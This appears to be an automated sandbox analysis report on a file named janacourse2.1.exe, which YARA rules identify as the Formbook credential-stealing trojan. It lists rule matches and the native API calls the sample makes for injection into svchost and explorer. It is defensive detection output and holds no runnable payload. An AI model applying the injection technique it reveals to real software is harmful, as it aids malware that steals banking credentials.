          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01049576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_01049576

          E-Banking Fraud

          Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: janacourse2.1.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: janacourse2.1.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: janacourse2.1.exe, 00000000.00000000.1640059570.0000000001072000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_a5b0a271-1
          Source: janacourse2.1.exe, 00000000.00000000.1640059570.0000000001072000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_59d6fe3f-5
          Source: janacourse2.1.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_89bff2d8-b
          Source: janacourse2.1.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f7c3bcff-e
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A330 NtCreateFile, 1_2_0041A330
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A3E0 NtReadFile, 1_2_0041A3E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A460 NtClose, 1_2_0041A460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A510 NtAllocateVirtualMemory, 1_2_0041A510
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A32C NtCreateFile, 1_2_0041A32C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A383 NtCreateFile, 1_2_0041A383
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A45A NtClose, 1_2_0041A45A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A50A NtAllocateVirtualMemory, 1_2_0041A50A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A58A NtAllocateVirtualMemory, 1_2_0041A58A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A58C NtAllocateVirtualMemory, 1_2_0041A58C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B60 NtClose, LdrInitializeThunk, 1_2_03472B60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 1_2_03472BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AD0 NtReadFile, LdrInitializeThunk, 1_2_03472AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F30 NtCreateSection, LdrInitializeThunk, 1_2_03472F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FE0 NtCreateFile, LdrInitializeThunk, 1_2_03472FE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F90 NtProtectVirtualMemory, LdrInitializeThunk, 1_2_03472F90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FB0 NtResumeThread, LdrInitializeThunk, 1_2_03472FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E80 NtReadVirtualMemory, LdrInitializeThunk, 1_2_03472E80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 1_2_03472EA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D10 NtMapViewOfSection, LdrInitializeThunk, 1_2_03472D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D30 NtUnmapViewOfSection, LdrInitializeThunk, 1_2_03472D30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DD0 NtDelayExecution, LdrInitializeThunk, 1_2_03472DD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DF0 NtQuerySystemInformation, LdrInitializeThunk, 1_2_03472DF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CA0 NtQueryInformationToken, LdrInitializeThunk, 1_2_03472CA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474340 NtSetContextThread, 1_2_03474340
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474650 NtSuspendThread, 1_2_03474650
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BE0 NtQueryValueKey, 1_2_03472BE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B80 NtQueryInformationFile, 1_2_03472B80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BA0 NtEnumerateValueKey, 1_2_03472BA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AF0 NtWriteFile, 1_2_03472AF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AB0 NtWaitForSingleObject, 1_2_03472AB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F60 NtCreateProcessEx, 1_2_03472F60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FA0 NtQuerySection, 1_2_03472FA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E30 NtWriteVirtualMemory, 1_2_03472E30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EE0 NtQueueApcThread, 1_2_03472EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D00 NtSetInformationFile, 1_2_03472D00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DB0 NtEnumerateKey, 1_2_03472DB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C60 NtCreateKey, 1_2_03472C60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C70 NtFreeVirtualMemory, 1_2_03472C70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C00 NtQueryInformationProcess, 1_2_03472C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CC0 NtQueryVirtualMemory, 1_2_03472CC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CF0 NtOpenProcess, 1_2_03472CF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473010 NtOpenDirectoryObject, 1_2_03473010
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473090 NtSetValueKey, 1_2_03473090
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034735C0 NtCreateMutant, 1_2_034735C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034739B0 NtGetContextThread, 1_2_034739B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D70 NtOpenThread, 1_2_03473D70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D10 NtOpenProcessToken, 1_2_03473D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread, NtClose, 1_2_032DA036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA042 NtQueryInformationProcess, 1_2_032DA042
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BAE12 NtProtectVirtualMemory, 2_2_0E5BAE12
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B9232 NtCreateFile, 2_2_0E5B9232
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BAE0A NtProtectVirtualMemory, 2_2_0E5BAE0A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22CA0 NtQueryInformationToken, LdrInitializeThunk, 3_2_04B22CA0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22C70 NtFreeVirtualMemory, LdrInitializeThunk, 3_2_04B22C70
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22C60 NtCreateKey, LdrInitializeThunk, 3_2_04B22C60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22DF0 NtQuerySystemInformation, LdrInitializeThunk, 3_2_04B22DF0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22DD0 NtDelayExecution, LdrInitializeThunk, 3_2_04B22DD0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22D10 NtMapViewOfSection, LdrInitializeThunk, 3_2_04B22D10
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 3_2_04B22EA0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22FE0 NtCreateFile, LdrInitializeThunk, 3_2_04B22FE0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22F30 NtCreateSection, LdrInitializeThunk, 3_2_04B22F30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22AD0 NtReadFile, LdrInitializeThunk, 3_2_04B22AD0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 3_2_04B22BF0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22BE0 NtQueryValueKey, LdrInitializeThunk, 3_2_04B22BE0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22B60 NtClose, LdrInitializeThunk, 3_2_04B22B60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B235C0 NtCreateMutant, LdrInitializeThunk, 3_2_04B235C0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B24650 NtSuspendThread, 3_2_04B24650
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B24340 NtSetContextThread, 3_2_04B24340
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22CF0 NtOpenProcess, 3_2_04B22CF0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22CC0 NtQueryVirtualMemory, 3_2_04B22CC0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22C00 NtQueryInformationProcess, 3_2_04B22C00
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22DB0 NtEnumerateKey, 3_2_04B22DB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22D30 NtUnmapViewOfSection, 3_2_04B22D30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22D00 NtSetInformationFile, 3_2_04B22D00
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22E80 NtReadVirtualMemory, 3_2_04B22E80
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22EE0 NtQueueApcThread, 3_2_04B22EE0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22E30 NtWriteVirtualMemory, 3_2_04B22E30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22FB0 NtResumeThread, 3_2_04B22FB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22FA0 NtQuerySection, 3_2_04B22FA0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22F90 NtProtectVirtualMemory, 3_2_04B22F90
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22F60 NtCreateProcessEx, 3_2_04B22F60
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22AB0 NtWaitForSingleObject, 3_2_04B22AB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22AF0 NtWriteFile, 3_2_04B22AF0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22BA0 NtEnumerateValueKey, 3_2_04B22BA0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B22B80 NtQueryInformationFile, 3_2_04B22B80
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B23090 NtSetValueKey, 3_2_04B23090
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B23010 NtOpenDirectoryObject, 3_2_04B23010
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B23D10 NtOpenProcessToken, 3_2_04B23D10
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B23D70 NtOpenThread, 3_2_04B23D70
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04B239B0 NtGetContextThread, 3_2_04B239B0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA3E0 NtReadFile, 3_2_029EA3E0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA330 NtCreateFile, 3_2_029EA330
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA460 NtClose, 3_2_029EA460
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA510 NtAllocateVirtualMemory, 3_2_029EA510
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA383 NtCreateFile, 3_2_029EA383
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA32C NtCreateFile, 3_2_029EA32C
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA45A NtClose, 3_2_029EA45A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA58C NtAllocateVirtualMemory, 3_2_029EA58C
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA58A NtAllocateVirtualMemory, 3_2_029EA58A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_029EA50A NtAllocateVirtualMemory, 3_2_029EA50A
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_0499A036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread, 3_2_0499A036
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04999BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose, 3_2_04999BAF
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_0499A042 NtQueryInformationProcess, 3_2_0499A042
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 3_2_04999BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, 3_2_04999BB2
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0101D5EB: CreateFileW, DeviceIoControl, CloseHandle, 0_2_0101D5EB
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01011201 LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock, 0_2_01011201
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0101E8F6 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, 0_2_0101E8F6
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFA2322_2_10CFA232
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF4B322_2_10CF4B32
          Source: C:\Windows\explorer.exeCode function: 2_2_10CF4B302_2_10CF4B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9E4F63_2_04B9E4F6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B944203_2_04B94420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA24463_2_04BA2446
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB05913_2_04BB0591
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF05353_2_04AF0535
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0C6E03_2_04B0C6E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEC7C03_2_04AEC7C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF07703_2_04AF0770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B147503_2_04B14750
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B820003_2_04B82000
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB01AA3_2_04BB01AA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA41A23_2_04BA41A2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA81CC3_2_04BA81CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8A1183_2_04B8A118
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE01003_2_04AE0100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B781583_2_04B78158
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B702C03_2_04B702C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B902743_2_04B90274
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB03E63_2_04BB03E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFE3F03_2_04AFE3F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAA3523_2_04BAA352
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B90CB53_2_04B90CB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE0CF23_2_04AE0CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF0C003_2_04AF0C00
